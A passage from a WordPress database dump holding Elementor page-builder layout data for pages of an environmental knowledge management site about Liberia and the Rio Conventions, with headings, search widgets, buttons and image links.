Resources.<\\/p>\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"400\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"search_submit_label\":\"Search\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"All Categories\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_theme\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":4,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Themes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-themes\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c4de34e\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\"},\"elements\":[{\"id\":\"08ca173\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"660b9f5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"18eb3ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(5820,518,'_elementor_version','2.7.5'),(5821,518,'_elementor_template_type','wp-page'),(5831,520,'_wp_page_template','default'),(5832,520,'_elementor_edit_mode','builder'),(5833,520,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_forest_biodiversity.jpg\",\"id\":396},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.<\\/p>\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"400\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"search_submit_label\":\"Search\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"All Categories\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_theme\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":4,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Themes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-themes\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore Documents Database\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"82036e6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"420de78\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"be90f2f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(5834,520,'_elementor_version','2.7.5'),(5835,520,'_elementor_template_type','wp-page'),(5837,521,'_wp_page_template','default'),(5838,521,'_elementor_edit_mode','builder'),(5839,521,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_forest_biodiversity.jpg\",\"id\":396},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"t